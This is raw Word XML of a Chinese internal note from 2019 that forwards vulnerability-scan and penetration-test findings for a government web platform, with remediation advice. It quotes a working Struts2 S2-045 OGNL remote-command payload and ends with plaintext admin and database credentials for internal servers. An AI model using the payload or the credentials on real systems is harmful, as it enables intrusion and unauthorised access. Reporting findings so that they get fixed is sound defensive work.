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25" w:rsidRDefault="006C5925" w:rsidP="006C5925">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C5925">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>关于等保测评中漏扫及渗透报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C13" w:rsidRPr="006C5925" w:rsidRDefault="00713C13" w:rsidP="00713C13">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>罗克佳华给了一个等保测评的漏扫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>及渗透报告的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>文档，其中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>个是国发软件的问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>现在需要咱们解决，具体问题如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00276BA1" w:rsidRPr="005B2210" w:rsidRDefault="00276BA1" w:rsidP="00276BA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:num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144145" cy="144145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="1" name="图片 1" descr="E:\日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_hig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日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_high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D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Struts2 S2-045 </w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞（</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2017-5638</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危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6812"/>
      </w:tblGrid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请求方式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auto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GET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URL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EAF5F9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http://192.168.120.99:8080/jointframe/console/ConsoleLogin!index.page?loginError=auth_failed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问题参数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auto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Content-Type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参考（验证）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EAF5F9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http://192.168.120.99:8080/jointframe/console/ConsoleLogin!index.page?loginError=auth_failed(CONTENT-TYPE)${(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo mzoeikknutwbxhgylivqopnqatbclxlxcyhgumfnrdsikvxndmobpcfyqezk').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00276BA1" w:rsidRDefault="00276BA1" w:rsidP="00276BA1"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="85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6812"/>
      </w:tblGrid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详细描述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auto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 xml:space="preserve">Struts2 是第二代基于Model-View-Controller (MVC)模型的web应用框架。 Struts2是java企业级web应用的可扩展性的框架。它是WebWork和Struts社区合并后的产物。 </w:t>
            </w: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br/>
              <w:t xml:space="preserve"> </w:t>
            </w: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br/>
              <w:t xml:space="preserve">Struts2在使用基于Jakarta插件的文件上传功能时可能存在远程命令执行，攻击者可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞，进而执行系统命令导致系统被入侵。 </w:t>
            </w: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br/>
              <w:t xml:space="preserve"> </w:t>
            </w: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br/>
              <w:t xml:space="preserve">影响版本：Struts 2.3.5-Struts 2.3.31、Struts 2.5-Struts 2.5.10 </w:t>
            </w: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br/>
              <w:t>安全版本：Struts 2.3.32、Struts 2.5.10.1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解决办法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EAF5F9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 xml:space="preserve">1、如您正在使用Jakarta文件上传插件或者是存在漏洞的Struts 2版本请升级至Struts2安全版本。 </w:t>
            </w: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br/>
              <w:t>2、使用Servlet过滤器验证Content-Type丢弃不匹配的请求multipart/form-data。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威胁分值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auto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10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危险插件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EAF5F9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否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发现日期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auto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2017-03-07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lastRenderedPageBreak/>
              <w:t>CVE编号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EAF5F9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CVE-2017-5638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CVSS评分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auto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7.3(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D36D59" w:rsidRDefault="00D36D59"/>
    <w:p w:rsidR="00276BA1" w:rsidRDefault="00276BA1" w:rsidP="00276BA1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:rightChars="50" w:right="105"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc377627022"/>
      <w:bookmarkStart w:id="1" w:name="_Toc377627370"/>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00276BA1" w:rsidRPr="005B2210" w:rsidRDefault="00276BA1" w:rsidP="00276BA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:num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144145" cy="144145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="3" name="图片 3" descr="E:\日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_midd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日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_middl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D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到目标站点存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架库漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中危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6812"/>
      </w:tblGrid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请求方式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auto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GET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URL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EAF5F9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http://192.168.120.99:8080/jointframe/static/script/jquery.js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问题参数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auto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参考（验证）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EAF5F9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jquery:1.8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00276BA1" w:rsidRDefault="00276BA1" w:rsidP="00276BA1"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="85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6812"/>
      </w:tblGrid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详细描述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auto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JavaScript 框架或库是一组能轻松生成跨浏览器兼容的 JavaScript 代码的工具和函数。如果网站使用了存在漏洞的 JavaScript 框架或库，攻击者就可以利用此漏洞来劫持用户浏览器，进行挂马、XSS、Cookie劫持等攻击。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解决办法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EAF5F9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将受影响的javascript框架库升级到最新版本。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威胁分值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auto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6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危险插件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EAF5F9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否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发现日期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auto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2001-01-01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CVSS评分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EAF5F9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6.1(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00276BA1" w:rsidRPr="005B2210" w:rsidRDefault="00276BA1" w:rsidP="00276BA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:num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144145" cy="144145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="2" name="图片 2" descr="E:\日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_midd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日常工作\2019年日常工作\4月\0426 初测反馈\等保2019初测反馈\等保2019初测反馈\初测反馈\漏扫及渗透报告\山西省环保厅\网站\vuln_middl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D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http host</w:t>
      </w:r>
      <w:r w:rsidRPr="00813D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头攻击漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00BA7BBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中危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6812"/>
      </w:tblGrid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请求方式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auto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GET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URL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EAF5F9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http://192.168.120.99:8080/jointframe/app/sso/login?service=http://192.168.120.99:8080/jointframe/app/sso/j_sso_spring_security_check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问题参数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auto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Host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参考（验证）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EAF5F9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http://192.168.120.99:8080/jointframe/app/sso/login?service=http://192.168.120.99:8080/jointframe/app/sso/j_sso_spring_security_check(HOST)www.zqculh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00276BA1" w:rsidRDefault="00276BA1" w:rsidP="00276BA1"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="85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6812"/>
      </w:tblGrid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详细描述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auto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为了方便的获得网站域名，开发人员一般依赖于HTTP Host header。例如，在php里用_SERVER["HTTP_HOST"]。但是这个header是不可信赖的，如果应用程序没有对host header值进行处理，就有可能造成恶意代码的传入。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解决办法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EAF5F9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 xml:space="preserve">web应用程序应该使用SERVER_NAME而不是host header。 </w:t>
            </w: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br/>
              <w:t>在Apache和Nginx里可以通过设置一个虚拟机来记录所有的非法host header。在Nginx里还可以通过指定一个SERVER_NAME名单，Apache也可以通过指定一个SERVER_NAME名单并开启UseCanonicalName选项。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威胁分值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auto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5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危险插件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EAF5F9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否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发现日期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auto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2008-06-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276BA1" w:rsidRPr="009B7375" w:rsidTr="005D38D3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710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DCEBF0"/>
          </w:tcPr>
          <w:p w:rsidR="00276BA1" w:rsidRPr="009B7375" w:rsidRDefault="00276BA1" w:rsidP="005D38D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  <w:lang w:bidi="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B737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  <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>CVSS评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9ACAE1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF5F9"/>
          </w:tcPr>
          <w:p w:rsidR="00276BA1" w:rsidRPr="009B7375" w:rsidRDefault="00276BA1" w:rsidP="005D38D3">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="微软雅黑"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B7375">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
              </w:rPr>
              <w:t>6.1(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00276BA1" w:rsidRDefault="00713C13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>应用服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.14.1.22:3650  administrator/sxhbt_2009</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C13" w:rsidRDefault="00713C13" w:rsidP="00713C13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10.14.1.23:3650   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator/sxhbt_2009</w:t>
      </w:r>
      <w:r w:rsidR="002A3772">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  sa/</w:t>
      </w:r>
      <w:r w:rsidR="002A3772" w:rsidRPr="002A3772">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A3772" w:rsidRPr="002A3772">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>SXHBT_admin!@#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C13" w:rsidRDefault="00713C13" w:rsidP="00713C13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0009353A" w:rsidRPr="0009353A" w:rsidRDefault="0009353A" w:rsidP="0009353A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>国发</w:t>
      </w:r>
      <w:r w:rsidRPr="0009353A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>平台：</w:t>
      </w:r>
      <w:r w:rsidRPr="0009353A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.120.99:8080/jointframe/app/AppMain!index.page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713C13" w:rsidRPr="0009353A" w:rsidRDefault="0009353A" w:rsidP="0009353A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009353A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>msl/111111</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:sectPr w:rsidR="00713C13" w:rsidRPr="00093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04F0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764D3A7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="194841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D8"/>
    <w:rsid w:val="0009353A"/>
    <w:rsid w:val="00276BA1"/>
    <w:rsid w:val="002A3772"/>
    <w:rsid w:val="004F4CD8"/>
    <w:rsid w:val="006C5925"/>
    <w:rsid w:val="00713C13"/>
    <w:rsid w:val="00BA7BBC"/>
    <w:rsid w:val="00D3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1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6BA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三级标题"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00276BA1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60" w:line="415" w:lineRule="auto"/>
      <w:ind w:left="0" w:rightChars="50" w:right="105"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="微软雅黑" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:bCs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aliases w:val="三级标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00276BA1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="微软雅黑" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b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76BA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276B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6BA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1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6BA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三级标题"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00276BA1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60" w:line="415" w:lineRule="auto"/>
      <w:ind w:left="0" w:rightChars="50" w:right="105"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="微软雅黑" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:bCs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aliases w:val="三级标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00276BA1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="微软雅黑" w:hAnsi="Calibri Light" w:cs="Times New Roman"/>
      <w:b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76BA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276B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6BA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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-26T07:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-26T08:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>